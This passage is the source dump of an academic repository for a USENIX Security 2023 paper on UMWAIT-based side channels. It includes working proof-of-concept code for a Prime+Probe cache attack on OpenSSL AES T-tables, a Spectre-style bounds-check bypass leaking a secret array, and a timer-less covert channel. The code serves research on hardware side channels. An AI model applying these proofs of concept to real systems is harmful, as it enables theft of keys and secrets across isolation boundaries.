112 |             if(carry) {
113 |                 misses++;
114 |             } else {
115 |                 hits++;
116 |             }
117 |             
118 |             tries++;
119 |             t_sync = 0;
120 |         }
121 | 
122 |         if(tries == NUMBER_OF_ENCRYPTIONS) {
123 |             
124 |             if (fast && hits <= 0.90 * NUMBER_OF_ENCRYPTIONS) {
125 |                 t -= STEP;
126 |                 printf("t: %d\n", t);
127 |             }
128 | 
129 |             if (!fast && misses <= 0.90 * NUMBER_OF_ENCRYPTIONS) {
130 |                 t += STEP;
131 |                 printf("t: %d\n", t);
132 |             }
133 |             
134 |             tries = 0;
135 |             misses = 0;
136 |             hits = 0;
137 |     
138 |         }
139 | 
140 |     }
141 | 
142 |     printf("Calibrated Padding Length: %zd!!\n",t);
143 |     fflush(stdout);
144 |     return 0;
145 | }
146 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # UMWAIT
 2 | This repository contains the experiments of evaluation and case studies discussed in the paper 
 3 | * "(M)WAIT for It: Bridging the Gap between Microarchitectural and Architectural Side Channels" (USENIX Security'23). 
 4 | 
 5 | You can find the paper at the [USENIX website](https://publications.cispa.saarland/3769/1/mwait_sec23.pdf).
 6 | 
 7 | 
 8 | ## Tested Setup
 9 | We reverse engineer the memory-monitoring functions on Intel and AMD. 
10 | All systems are running Ubuntu 20.04 LTS (Linux kernel 5.4).
11 | 
12 | The result shows that the Intel-specific variant `UMONITOR/UMWAIT` instructions help convert microarchitectural into architectural states, which are only available on Intel latest core processors (Tremont and Alder Lake). 
13 | 
14 | In order to run the experiments and proof-of-concepts, the following prerequisites need to be fulfilled:
15 | 
16 | * Linux installation
17 |   * Build tools (gcc, make)
18 |   * [PTEditor](https://github.com/misc0110/PTEditor/)
19 |   * Stress
20 |   
21 | Throughout our experiments, we successfully evaluated our implementations on the following CPUs. However, most of the implementation should work on CPUs with the same microarchitecture.
22 | 
23 | | CPU                          | Microcode    | Microarchitecture |
24 | | ---------------------------- | -----------  | ----------------- |
25 | | Intel Celeron N4500          | `0x24000014` | Jasper Lake       |
26 | | Intel Core i9-12900K         | `0xf`        | Alder Lake        |
27 | | Intel Core i7-8565U          | `0xec`       | Whiskey Lake      |
28 | | Intel Core i7-10710U         | `0xe8`       | Comet Lake        |
29 | | AMD Ryzen 5 2500U            | `0x810100b`  | Zen               |
30 | | AMD Ryzen 5 3550H            | `0x8108102`  | Zen+              |
31 | | AMD Ryzen 9 5900HX           | `0xa50000c`  | Zen3              |
32 | 
33 | 
34 | ## Materials
35 | This repository contains the following materials:
36 | 
37 | * `Intel-umwait`: contains the code that test if `umonitor/umwait` work on the current processor.
38 | * `trigger-tester`: contains the code that we used to analyse the wakeup-trigger of all `mwait-` variants (Table 1-2).
39 | * `timed_mwait_feat`: contains the code that we reverse engineered the Intel's undocumented `timed-mwait` feature.
40 | * `comparison`: contains the code that we constructed a standard benchmark for detecting fully asynchronous events with Transient-Writes-Monitor (TWM) and other conventional side-channel attacks for reference (Figure 1-2, Table 3).
41 | * `covert_channel_eval`: contains the code that we created a timer-less covert channel with `umonitor/umwait` (Figure 4).
42 | * `spectral`: contains the code that we used the timer-less covert channel for spectre attacks (Figure 5-6).
43 | * `aes_example`: contains the code that we reproduced attacks on AES T-table implementation based on our Timer-less Timing Measurement (Figure 3, 7).
44 | * `irq_monitor`: contains the code that we can monitor network interrupts via the `mwait-` instructions on x86 and `wfi` instruction on arm.
45 | * `website_fingerprinting`: contains the code that we detected network interrupts while opening a website (Figure 8).
46 | * `website_classify`: contains the classifier for website classification (Figure 9).
47 | 
48 | ## Contact
49 | If there are questions regarding these experiments, please send an email to `ruiyi.zhang (AT) cispa.de` or message `@Rayiizzz` on Twitter.
50 | 
51 | ## Research Paper
52 | The paper is available at the [USENIX website](https://www.usenix.org/conference/usenixsecurity23/presentation/zhang-ruiyi). 
53 | You can cite our work with the following BibTeX entry:
54 | ```latex
55 | @inproceedings{Zhang2023MWAIT,
56 |   year={2023},
57 |   title={{(M)WAIT for It: Bridging the Gap between Microarchitectural and Architectural Side Channels}},
58 |   booktitle={USENIX Security},
59 |   author={Ruiyi Zhang and Taehyun Kim and Daniel Weber and Michael Schwarz}
60 | }
61 | ```
62 | 
63 | ## Disclaimer
64 | We are providing this code as-is. 
65 | You are responsible for protecting yourself, your property and data, and others from any risks caused by this code. 
66 | 


--------------------------------------------------------------------------------
/aes_example/pp/spy.cpp:
--------------------------------------------------------------------------------
  1 | #include <stdio.h>
  2 | #include <stdint.h>
  3 | #include <unistd.h>
  4 | #include <stdlib.h>
  5 | #include <openssl/aes.h>
  6 | #include <fcntl.h>
  7 | #include <sched.h>
  8 | #include <sys/mman.h>
  9 | #include "../cacheutils.h"
 10 | #include "eviction.h"
 11 | #include <map>
 12 | #include <vector>
 13 | 
 14 | // this number varies on different systems
 15 | #define PRIME_THRESHOLD (240)
 16 | 
 17 | // more encryptions show features more clearly
 18 | #define NUMBER_OF_ENCRYPTIONS (5000)
 19 | 
 20 | extern "C" Elem* evset_find(void* addr);
 21 | 
 22 | unsigned char key[] =
 23 | {
 24 |   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 25 |   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 26 |   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 27 |   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
 28 |   //0x51, 0x4d, 0xab, 0x12, 0xff, 0xdd, 0xb3, 0x32, 0x52, 0x8f, 0xbb, 0x1d, 0xec, 0x45, 0xce, 0xcc, 0x4f, 0x6e, 0x9c,
 29 |   //0x2a, 0x15, 0x5f, 0x5f, 0x0b, 0x25, 0x77, 0x6b, 0x70, 0xcd, 0xe2, 0xf7, 0x80
 30 | };
 31 | 
 32 | size_t sum;
 33 | size_t scount;
 34 | 
 35 | std::map<char*, std::map<size_t, size_t> > timings;
 36 | 
 37 | char* base;
 38 | char* probe;
 39 | char* end;
 40 | 
 41 | void traverse(Elem* arr) {
 42 |   Elem *ptr = arr;
 43 | 
 44 |   for(int i=0; i<13; i+=2) {
 45 |     maccess((void *) ptr->next->next->next);
 46 |     maccess((void *) ptr->next->next);
 47 |     //maccess((void *) arr);
 48 |     maccess((void *) ptr->next);
 49 |     ptr = ptr->next->next;
 50 |   }
 51 | }
 52 | 
 53 | void prime(Elem* arr)
 54 | {
 55 |     traverse(arr);
 56 |     //traverse(arr);
 57 | }
 58 | 
 59 | int main()
 60 | {
 61 |   int fd = open("/home/rzhang/openssl/libcrypto.so", O_RDONLY);
 62 |   size_t size = lseek(fd, 0, SEEK_END);
 63 |   if (size == 0)
 64 |     exit(-1);
 65 |   size_t map_size = size;
 66 |   if ((map_size & 0xFFF) != 0)
 67 |   {
 68 |     map_size |= 0xFFF;
 69 |     map_size += 1;
 70 |   }
 71 |   base = (char*) mmap(0, map_size, PROT_READ, MAP_SHARED, fd, 0);
 72 |   end = base + size;
 73 | 
 74 |   unsigned char plaintext[] =
 75 |   {
 76 |   0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
 77 |   };
 78 |   unsigned char ciphertext[128];
 79 |   unsigned char restoredtext[128];
 80 | 
 81 |   AES_KEY key_struct;
 82 | 
 83 |   AES_set_encrypt_key(key, 128, &key_struct);
 84 |   AES_encrypt(plaintext, ciphertext, &key_struct);
 85 | 
 86 |   // adjust me (decreasing order)
 87 |   int te0 = 0x15df80;
 88 |   int te1 = 0x15db80;
 89 |   int te2 = 0x15d780;
 90 |   int te3 = 0x15d380;
 91 | 
 92 | 
 93 |   for (probe = base + te0; probe < base + te0 + 16*64; probe += 64) {
 94 |     maccess(probe);
 95 |   }
 96 | 
 97 |   probe = base+te0;
 98 |   Elem* s = evset_find(probe);
 99 |   Elem* eviction_sets[16];
100 | 
101 |   for (probe = base + te0; probe < base + te0 + 16*64; probe += 64) {
102 |     int index = (probe - base - te0) / 64;
103 |     eviction_sets[index] = evset_find(probe);
104 |   }
105 | 
106 |   uint64_t min_time = rdtsc();
107 |   srand(min_time);
108 |   sum = 0;
109 |   for (size_t byte = 0; byte < 256; byte += 16)
110 |   {
111 |     plaintext[0] = byte;
112 |     //plaintext[1] = byte;
113 |     //plaintext[2] = byte;
114 |     //plaintext[3] = byte;
115 | 
116 |     AES_encrypt(plaintext, ciphertext, &key_struct);
117 | 
118 |     //adjust address range to exclude unwanted lines/tables
119 |     for (probe = base + te0; probe < base + te0 + 16*64; probe += 64) 
120 |     {
121 |       int index = (probe - base - te0) / 64;
122 |       prime(eviction_sets[index]);
123 |       mfence();
124 | 
125 |       size_t count = 0;
126 |       for (size_t i = 0; i < NUMBER_OF_ENCRYPTIONS; ++i)
127 |       {
128 |         for (size_t j = 1; j < 16; ++j)
129 |           plaintext[j] = rand() % 256;
130 |           
131 |         AES_encrypt(plaintext, ciphertext, &key_struct);
132 |         //maccess(probe);
133 |         mfence();
134 |         sched_yield();
135 | 
136 |         size_t time = rdtsc();
137 |         prime(eviction_sets[index]);
138 | 	      size_t delta = rdtsc() - time;
139 | 	      mfence();
140 | 
141 |         if (delta >= PRIME_THRESHOLD)
142 |           ++count;
143 |       }
144 |       timings[probe][byte] = count;
145 |     }
146 |   }
147 |  
148 |   for (auto ait : timings)
149 |   {
150 |     printf("%p", (void*) (ait.first - base));
151 |     for (auto kit : ait.second)
152 |     {
153 |       int s = kit.second - NUMBER_OF_ENCRYPTIONS / 100 * 90;
154 |       printf(",%6d", s < 0 ? 0 : s);
155 |     }
156 |     printf("\n");
157 |   }
158 | 
159 |   close(fd);
160 |   munmap(base, map_size);
161 |   fflush(stdout);
162 |   return 0;
163 | }
164 | 
165 | 


--------------------------------------------------------------------------------
/covert_channel_eval/validate.py:
--------------------------------------------------------------------------------
  1 | #! /usr/bin/env python3
  2 | 
  3 | from itertools import groupby
  4 | import math
  5 | 
  6 | TRANSMITTED_PATTERN = "01011001"
  7 | 
  8 | 
  9 | def extend_to_manchester(pattern):
 10 |     res = ""
 11 |     for c in pattern:
 12 |         if c == "1":
 13 |             res += "01"
 14 |         elif c == "0":
 15 |             res += "10"
 16 |         else:
 17 |             assert False
 18 |     return res
 19 | 
 20 | 
 21 | def decode_manchester(manchester, offset=0):
 22 |     decoded = []
 23 | 
 24 |     valid = True
 25 |     for i in range(offset, len(manchester) - 1, 2):
 26 |         if manchester[i] == '0' and manchester[i + 1] == '1':
 27 |             decoded.append("1")
 28 |         elif manchester[i] == '1' and manchester[i + 1] == '0':
 29 |             decoded.append("0")
 30 |         else:
 31 |             decoded.append("X")
 32 |             valid = False
 33 |     return (valid, decoded)
 34 | 
 35 | 
 36 | def find_beginning(received_bits):
 37 |     target_pattern = extend_to_manchester(TRANSMITTED_PATTERN)
 38 |     for idx in range(len(received_bits)):
 39 |         if "".join(received_bits[idx:idx + len(target_pattern)]) == target_pattern:
 40 |             print(f"found beginning at idx {idx}")
 41 |             return idx
 42 |     print("Couldn't find beginning. Aborting")
 43 |     assert False
 44 | 
 45 | def find_decoded_ending(manchester_decoded_bits):
 46 |     # use this only AFTER manchester encoding was decoded
 47 |     for idx in range(len(manchester_decoded_bits)):
 48 |         idx_from_behind = len(manchester_decoded_bits) - 1 - idx
 49 |         c = manchester_decoded_bits[idx_from_behind]
 50 |         if c != "X":
 51 |             return idx_from_behind
 52 | 
 53 | 
 54 | 
 55 | def print_error_rate(received_bits_decoded):
 56 | 
 57 |     idx = 0
 58 |     correct = 0
 59 |     failed = 0
 60 |     consecutive_failures = 0
 61 |     sum_transmitted = 0
 62 |     for c in received_bits_decoded:
 63 |         if c == TRANSMITTED_PATTERN[idx]:
 64 |             correct += 1
 65 |             consecutive_failures = 0
 66 |         else:
 67 |             failed += 1
 68 |             consecutive_failures += 1
 69 |         idx = (idx + 1) % len(TRANSMITTED_PATTERN)
 70 |         sum_transmitted += 1
 71 | 
 72 |     consecutive_failures_threshold = 30
 73 |     if consecutive_failures > consecutive_failures_threshold:
 74 |         failed -= consecutive_failures_threshold
 75 |         sum_transmitted -= consecutive_failures_threshold
 76 | 
 77 | 
 78 |     correct_percentage = (correct / sum_transmitted) * 100
 79 | 
 80 |     print(f"Analyzed {len(received_bits_decoded)} decoded bits")
 81 |     print(f"Correct bits: {correct} ({correct_percentage}%)")
 82 |     print(f"Incorrect bits: {failed}")
 83 | 
 84 | def writeout_result(received_bits_decoded):
 85 |     with open("decoded.txt", "w") as fd:
 86 |         for idx in range(len(received_bits_decoded)-7):
 87 |             line = "".join(received_bits_decoded[idx:idx+8]) + "\n"
 88 |             fd.write(line)
 89 | def main():
 90 |     with open("recv.txt", "r") as fd_recv:
 91 |         received_bits = [i.strip() for i in fd_recv.readlines()]
 92 | 
 93 |         parts = ["".join(g) for k, g in groupby(received_bits)][2:]
 94 |         print(parts)
 95 |         one_parts = [len(x) for x in parts if x[0] == '1']
 96 |         zero_parts = [len(x) for x in parts if x[0] == '0']
 97 |         # we use idx 1 in the next two lines to filter out the lowest element
 98 |         # (sometimes measurement error)
 99 |         min_len1 = sorted(one_parts)[3]
100 |         min_len0 = sorted(zero_parts)[3]
101 |         manchester = []
102 |         for p in parts:
103 |             if p[0] == '0':
104 |                 frac = len(p) / min_len0
105 |                 c = int(round(frac, 0))
106 |                 print("0: %f (%d) - " % (frac, c))
107 |                 for i in range(c):
108 |                     manchester.append("0")
109 |             else:
110 |                 frac = len(p) / min_len1
111 |                 c = int(round(frac, 0))
112 |                 print("1: %f (%d) - " % (frac, c))
113 |                 for i in range(c):
114 |                     manchester.append("1")
115 |         # print(manchester)
116 |         # exit()
117 | 
118 |         print("len(manchester):", len(manchester))
119 |         start_offset = find_beginning(manchester)
120 |         received_bits_decoded = decode_manchester(manchester, start_offset)[1]
121 |         writeout_result(received_bits_decoded)
122 |         print("len(received_bits_decoded):", len(received_bits_decoded))
123 |         ending = find_decoded_ending(received_bits_decoded)
124 |         print(f"Ending at {ending}/{len(received_bits_decoded)}")
125 |         print_error_rate(received_bits_decoded[:ending+1])
126 | 
127 | 
128 | if __name__ == "__main__":
129 |     main()
130 | 


--------------------------------------------------------------------------------
/spectral/main.c:
--------------------------------------------------------------------------------
  1 | #define _GNU_SOURCE
  2 | #include <stdio.h>
  3 | #include <string.h>
  4 | 
  5 | #include <fcntl.h>
  6 | #include <immintrin.h>
  7 | #include <math.h>
  8 | #include <pthread.h>
  9 | #include <sched.h>
 10 | #include <signal.h>
 11 | #include <sys/mman.h>
 12 | #include <sys/stat.h>
 13 | #include <sys/types.h>
 14 | #include "cacheutils.h"
 15 | 
 16 | #define CORE_VICTIM 14
 17 | #define CORE_ATTACKER 15
 18 | 
 19 | #define OFFSET (64)
 20 | 
 21 | //#define ftime(x) (rdtsc() / 3200000000ul)
 22 | #define ftime time
 23 | 
 24 | volatile int running = 1;
 25 | 
 26 | volatile unsigned int array1_size = 16;
 27 | uint8_t __attribute__((aligned(4096))) array1[160] = {
 28 |     2,
 29 |     2,
 30 | };
 31 | __attribute__((aligned(4096))) char test[4096 * 256];
 32 | 
 33 | volatile uint8_t temp = 0;
 34 | 
 35 | char secret[] = {0, 1, 1, 0, 0, 1, 0, 1};
 36 | 
 37 | void __attribute__((noinline)) victim_function(size_t x) {
 38 |   temp &= array1[x] * 4096;
 39 |   if (x < array1_size) {
 40 |     test[array1[x] * OFFSET] = 1;
 41 |   }
 42 | }
 43 | 
 44 | void leakBit(size_t target_addr) {
 45 |   int tries = 0, i, j, k, mix_i;
 46 |   size_t training_x, x;
 47 | 
 48 |   /* 16 loops: 5 training runs (x=training_x) per attack run (x=target_addr) */
 49 |   training_x = 0; // tries % array1_size;
 50 |   for (j = 15; j >= 0; j--) {
 51 |     flush((unsigned int *)&array1_size);
 52 |     asm volatile("mfence");
 53 |     for (volatile int z = 0; z < 100; z++) {
 54 |     }
 55 | 
 56 |     x = ((j % 6) - 1) & ~0xFFFF;
 57 |     x = (x | (x >> 16));
 58 |     x = training_x ^ (x & (target_addr ^ training_x));
 59 | 
 60 |     victim_function(x);
 61 |   }
 62 | }
 63 | 
 64 | void pin_to_core(int core) {
 65 |   cpu_set_t cpuset;
 66 |   pthread_t thread;
 67 | 
 68 |   thread = pthread_self();
 69 | 
 70 |   CPU_ZERO(&cpuset);
 71 |   CPU_SET(core, &cpuset);
 72 | 
 73 |   pthread_setaffinity_np(thread, sizeof(cpu_set_t), &cpuset);
 74 | }
 75 | 
 76 | volatile char waiting = 0;
 77 | volatile size_t cnt = 0, cnt_carry = 0, wait_write = 0, writes = 0;
 78 | 
 79 | volatile int lbit = 0;
 80 | 
 81 | void *leak_thread(void *dummy) {
 82 |   pin_to_core(CORE_ATTACKER);
 83 |   test[OFFSET] = 1;
 84 |   size_t target_addr = (size_t)(secret - (char *)array1);
 85 |   printf("Target: %zd\n", target_addr);
 86 | 
 87 |   while (1) {
 88 |     asm volatile("mfence");
 89 |     while (1) {
 90 |       while (wait_write)
 91 |         ;
 92 |       asm volatile("mfence");
 93 |       leakBit(target_addr + lbit);
 94 | 
 95 |       writes++;
 96 |       wait_write = 1;
 97 |       asm volatile("mfence");
 98 |     }
 99 |     asm volatile("mfence");
100 |   }
101 | }
102 | 
103 | double channel_capacity(size_t C, double p) {
104 |   return C *
105 |          (1.0 + ((1.0 - p) * (log(1.0 - p) / log(2)) + p * (log(p) / log(2))));
106 | }
107 | 
108 | int main(int argc, char *argv[]) {
109 |   pthread_t p;
110 |   pthread_create(&p, NULL, leak_thread, NULL);
111 |   sched_yield();
112 | 
113 |   pin_to_core(CORE_VICTIM);
114 | 
115 |   memset(test, 1, sizeof(test));
116 | 
117 |   int bits_leaked = 0, bits_correct = 0;
118 | 
119 |   int timeout = -1;
120 |   if (argc > 1)
121 |     timeout = atoi(argv[1]);
122 | 
123 |   int start = ftime(NULL);
124 |   while (start == ftime(NULL))
125 |     ;
126 |   start = ftime(NULL);
127 |   int last_delta = 0;
128 | 
129 |   while (1) {
130 |     //         sched_yield();
131 |     asm volatile("umonitor %%rax" : : "a"(test + OFFSET), "c"(0), "d"(0));
132 |     size_t carry = 0;
133 |     wait_write = 0;
134 |     asm volatile("xor %%rbx, %%rbx; umwait %%rcx; jnc 1f; inc %%rbx; 1: nop"
135 |                  : "=b"(carry)
136 |                  : "a"(-1), "d"(-1), "c"(0)
137 |                  : "memory");
138 |     cnt_carry += carry;
139 |     cnt++;
140 |     while (!wait_write)
141 |       ;
142 | 
143 |     if (cnt == 1) {
144 | 
145 |       bits_leaked++;
146 |       if (!cnt_carry == secret[lbit])
147 |         bits_correct++;
148 |       int current = ftime(NULL);
149 |       int delta = current - start;
150 |       if (!delta)
151 |         delta = 1;
152 | 
153 |       if (delta != last_delta) {
154 |         int speed = bits_leaked / delta;
155 |         double err = ((double)(bits_leaked - bits_correct) / bits_leaked);
156 |         printf(
157 |             "%.3f%% error [%d leaked, %d s -> %d bits/s] - TC: %.1f bits/s\n",
158 |             err * 100.0, bits_leaked, delta, speed,
159 |             channel_capacity(speed, err));
160 |         fflush(stdout);
161 |         last_delta = delta;
162 |         timeout--;
163 |         if (timeout == 0) {
164 |           printf("%.3f,%d,%.1f\n", err * 100.0, speed,
165 |                  channel_capacity(speed, err));
166 |           exit(0);
167 |         }
168 |       }
169 |       cnt = 0;
170 |       cnt_carry = 0;
171 |       writes = 0;
172 |       lbit = (lbit + 1) % (sizeof(secret) / sizeof(secret[0]));
173 |     }
174 |   }
175 | 
176 |   return 0;
177 | }
178 | 


--------------------------------------------------------------------------------
/comparison/pp/main.c:
--------------------------------------------------------------------------------
  1 | #define _GNU_SOURCE
  2 | #include <stdio.h>
  3 | #include <stdint.h>
  4 | #include <stdlib.h>
  5 | #include <string.h>
  6 | #include <pthread.h>
  7 | #include <fcntl.h>
  8 | #include <time.h>
  9 | #include <sched.h>
 10 | #include "eviction.h"
 11 | #include "../cacheutils.h"
 12 | 
 13 | #define CORE1 2 
 14 | #define CORE2 3
 15 | 
 16 | #define OFFSET 17*64
 17 | 
 18 | volatile char __attribute__((aligned(4096))) data[4096];
 19 | size_t event_internal = 500000;
 20 | 
 21 | void pin_to_core(int core) {
 22 |     cpu_set_t cpuset;
 23 |     pthread_t thread;
 24 | 
 25 |     thread = pthread_self();
 26 | 
 27 |     CPU_ZERO(&cpuset);
 28 |     CPU_SET(core, &cpuset);
 29 | 
 30 |     pthread_setaffinity_np(thread, sizeof(cpu_set_t), &cpuset);
 31 | }
 32 | 
 33 | void access_speculative2(void* ptr) {
 34 |     speculation_start(s);
 35 |     *(char*)ptr;
 36 |     speculation_end(s);
 37 | }
 38 | 
 39 | int cnt = 0;
 40 | size_t volatile t_sync = 0;
 41 | 
 42 | void* accessor(void* dummy) {
 43 |     pin_to_core(CORE2);
 44 | 
 45 |     int seed = time(NULL); 
 46 |     srand(seed);
 47 |     printf("Go!\n");
 48 | 
 49 |     while(1) {
 50 |         sched_yield();
 51 | 	    size_t r = rand() % event_internal + 1;
 52 | 
 53 | 	    wait(r);
 54 | 
 55 | 	    //access_speculative2(data);
 56 | 	    access_speculative2(data+OFFSET); // CONTROL
 57 | 	    cnt++;
 58 |     }
 59 | }
 60 | 
 61 | // Find Prime Access Patterns via tool PrimeTime (https://github.com/KULeuven-COSIC/PRIME-SCOPE/tree/main/primetime)
 62 | void traverse_B404_E1001_S4(Elem* arr) {
 63 |   Elem *ptr = arr;
 64 |   for(int i=0; i<13; i+=4) {
 65 |     maccess((void *) ptr);
 66 |     maccess((void *) ptr->next);
 67 |     maccess((void *) ptr->next->next);
 68 |     maccess((void *) arr);
 69 |     maccess((void *) ptr->next->next->next);
 70 |     ptr = ptr->next->next->next->next;
 71 |   }
 72 | }
 73 | 
 74 | void prime(Elem* arr)
 75 | {
 76 |     traverse_B404_E1001_S4(arr);
 77 |     //traverse_B404_E1001_S4(arr);
 78 |     //traverse_B404_E1001_S4(arr);
 79 | }
 80 | 
 81 | int main() {
 82 | 
 83 |     pin_to_core(CORE1);
 84 | 
 85 |     memset(data, 1, sizeof(data));
 86 | 
 87 |     int pos = 0, t = 0;
 88 |     int start = time(NULL);
 89 |     int current = time(NULL);
 90 | 
 91 |     Elem* eviction_set = evset_find(data);
 92 |     prime(eviction_set); mfence();
 93 |     
 94 |     size_t prime_time = 0, probe_prime_time = 0, count = 100000;
 95 | 
 96 |     // detect_prime_threshold
 97 |     for (int i = 0; i < count; i++) {
 98 |         size_t begin = rdtsc();
 99 |         prime(eviction_set);
100 |         size_t end = rdtsc();
101 |         mfence();
102 | 
103 |         prime_time += end - begin;
104 | 	    mfence();
105 | 
106 | 	    prime(eviction_set);
107 |         prime(eviction_set);
108 | 	    //sched_yield();
109 |     }
110 |     
111 |     for (int i = 0; i < count; i++) {
112 | 	    maccess(data); mfence();
113 | 
114 |         size_t begin = rdtsc();
115 |         prime(eviction_set);
116 |         size_t end = rdtsc();
117 |         mfence();
118 | 
119 |         probe_prime_time += end - begin;
120 | 	    mfence();
121 | 
122 |         // Same P+P in P+A paper (4.3), multiple probes (to recover)
123 |         prime(eviction_set);
124 |         prime(eviction_set);
125 |         //sched_yield();
126 |     }
127 | 
128 |     prime_time /= count;
129 |     probe_prime_time /= count;
130 | 
131 |     size_t prime_threshold = (probe_prime_time + prime_time * 2) / 3;
132 |     printf("prime_time: %ld  probe_prime_time: %ld\n", prime_time, probe_prime_time);
133 |     printf("prime_threshold: %ld\n", prime_threshold);
134 |     
135 |     pthread_t pt;
136 |     pthread_create(&pt, NULL, accessor, NULL);
137 |     sched_yield();
138 | 
139 |     size_t blind_spot_end = 0;
140 | 
141 |     while(1) {
142 | 
143 |         //Windowless P+P : the length of evset equal to the number of LLC ways
144 |         //wait(window_size);
145 | 
146 |         // Probe
147 |         size_t begin = rdtsc();
148 |         prime(eviction_set);
149 |         size_t end = rdtsc();
150 | 	    mfence();
151 | 
152 |         if (end - begin >= prime_threshold) {
153 |             pos++;
154 |             // Windowless technique
155 |             prime(eviction_set);
156 |             prime(eviction_set);
157 |             blind_spot_end += rdtsc() - begin;
158 |         }
159 | 
160 |         current = time(NULL);
161 |         if(start != current) {
162 |             start = current;
163 | 
164 |             printf("pos / cnt: %6d / %6d (%.2f)\n", pos, cnt, pos * 100.0 / cnt);
165 | 	        t++;
166 |             pos = 0;
167 |             cnt = 0;
168 | 	        blind_spot_end = 0;
169 | 
170 | 	        if (t == 100) {
171 |                 t = 0;
172 |                 event_internal = event_internal * 4 / 5;
173 |                 printf("event_internal alters!!!\n\n");
174 |                 if (event_internal < 1000) 
175 |                     break;
176 |             }
177 |         }
178 |     }
179 | }
180 | 
181 | 


--------------------------------------------------------------------------------
/covert_channel_eval/main.c:
--------------------------------------------------------------------------------
  1 | #define _GNU_SOURCE
  2 | 
  3 | #include <stdio.h>
  4 | #include <string.h>
  5 | #include <stdint.h>
  6 | 
  7 | #include <sys/types.h>
  8 | #include <sys/stat.h>
  9 | #include <fcntl.h>
 10 | #include "cacheutils.h"
 11 | #include <pthread.h>
 12 | #include <sched.h>
 13 | #include <immintrin.h>
 14 | #include <signal.h>
 15 | 
 16 | // set to 0 to use the channel architecturally (faster, but lame)
 17 | #define SPECULATIVE 1
 18 | #define CORE_RECEIVER 1
 19 | #define CORE_SENDER 0
 20 | 
 21 | // ATTENTION: BITS_TO_SEND should be smaller than BITS_TO_RECEIVE
 22 | #define BITS_TO_SEND 108 // 100 bits + 8 for the first detected pattern
 23 | #define BITS_TO_RECEIVE 700
 24 | 
 25 | #define OFFSET (64 * 21)
 26 | 
 27 | #define WINDOW_SIZE 8
 28 | 
 29 | #define BYTE(x) ((x) >> 7) & 1, ((x) >> 6) & 1, ((x) >> 5) & 1, ((x) >> 4) & 1, ((x) >> 3) & 1, ((x) >> 2) & 1, ((x) >> 1) & 1, (x) & 1
 30 | 
 31 | volatile int running = 1;
 32 | 
 33 | char to_send[] = {0, 1, 0, 1, 1, 0, 0, 1}; // ASCII 'M' (in little endian)
 34 | //char to_send[] = {BYTE('T'), BYTE('e'), BYTE('s'), BYTE('t'), BYTE('!')};
 35 | 
 36 | void pin_to_core(int core) {
 37 |   cpu_set_t cpuset;
 38 |   pthread_t thread;
 39 | 
 40 |   thread = pthread_self();
 41 | 
 42 |   CPU_ZERO(&cpuset);
 43 |   CPU_SET(core, &cpuset);
 44 | 
 45 |   pthread_setaffinity_np(thread, sizeof(cpu_set_t), &cpuset);
 46 | }
 47 | 
 48 | uint64_t gettimestamp() {
 49 |   struct timeval tv;
 50 |   gettimeofday(&tv,NULL);
 51 |   return tv.tv_sec * (uint64_t)1000000 + tv.tv_usec;
 52 | }
 53 | 
 54 | #if SPECULATIVE
 55 | #define do_write write_spec
 56 | #else
 57 | #define do_write write_arch
 58 | #endif
 59 | 
 60 | void write_spec(void* ptr, int value) {
 61 |   speculation_start(s);
 62 |   *(char*) ptr = 3;
 63 |   *(char*) (ptr + 1) = 3;
 64 |   *(char*) (ptr + 2) = 3;
 65 |   *(char*) (ptr + 3) = 3;
 66 |   speculation_end(s);
 67 | }
 68 | 
 69 | void write_arch(void* ptr, int value) {
 70 |   *(volatile char*) ptr = 3;
 71 | }
 72 | 
 73 | __attribute__((aligned(4096))) char test[4096 * 256];
 74 | 
 75 | void* keystroke_thread(void* dummy) {
 76 |   pin_to_core(CORE_SENDER);
 77 |   //printf("[~] Waiting for keypress to start sending\n");
 78 |   test[OFFSET] = 1;
 79 | 
 80 |   //getchar();
 81 |   //printf("[+] Go! Press Ctrl+C to stop transmission\n");
 82 |   FILE* fd = fopen("send.txt", "w");
 83 |   asm volatile("mfence");
 84 |   size_t c = 0;
 85 |   int repeat = 200000;
 86 |   int zdiv = 100;
 87 | 
 88 |   for (int i = 0; i < BITS_TO_SEND; i++) {
 89 |     // use manchester encoding: 1 -> 01, 0 -> 10
 90 |     fprintf(fd, "%d\n", to_send[c]);
 91 |     if (to_send[c]) {
 92 |       asm volatile("mfence");
 93 |       for (int r = 0; r < repeat; r++) {
 94 |         do_write(test + OFFSET + 512, 2); // 0
 95 |       }
 96 |       asm volatile("mfence");
 97 |       for (int r = 0; r < repeat / zdiv; r++) {
 98 |         do_write(test + OFFSET, 2); // 1
 99 |       }
100 |       asm volatile("mfence");
101 |     } else {
102 |       asm volatile("mfence");
103 |       for (int r = 0; r < repeat / zdiv; r++) {
104 |         do_write(test + OFFSET, 2); // 1
105 |       }
106 |       asm volatile("mfence");
107 |       for (int r = 0; r < repeat; r++) {
108 |         do_write(test + OFFSET + 512, 2); // 0
109 |       }
110 |       asm volatile("mfence");
111 |     }
112 |     c = (c + 1) % (sizeof(to_send) / sizeof(to_send[0]));
113 |     asm volatile("mfence");
114 |   }
115 |   fflush(fd);
116 |   printf("sender finished\n");
117 | }
118 | 
119 | int main(int argc, char* argv[]) {
120 |   printf("starting\n");
121 |   pthread_t p;
122 |   pthread_create(&p, NULL, keystroke_thread, NULL);
123 |   sched_yield();
124 | 
125 |   pin_to_core(CORE_RECEIVER);
126 | 
127 |   memset(test, 1, sizeof(test));
128 | 
129 |   int last_val = -1;
130 |   int ptr = 0, same = 0;
131 | 
132 |   FILE* fd = fopen("recv.txt", "w");
133 |   uint64_t starttime = gettimestamp();
134 |   for (size_t received = 0; received < 2 * BITS_TO_RECEIVE; received++) {
135 |     int repeat = 8;
136 |     int cnt = 0;
137 |     
138 |     for (int i = 0; i < repeat; i++) {
139 |       asm volatile("umonitor %%rax" : : "a"(test + OFFSET), "c"(0), "d"(0));
140 |       size_t carry = 0;
141 |       asm volatile("xor %%rbx, %%rbx;\n\t"
142 |                    "umwait %%rcx;\n\t"
143 |                    "jc 1f;\n\t"  // carry is set when timeout hits ('0' is transmitted)
144 |                    "inc %%rbx;\n\t"
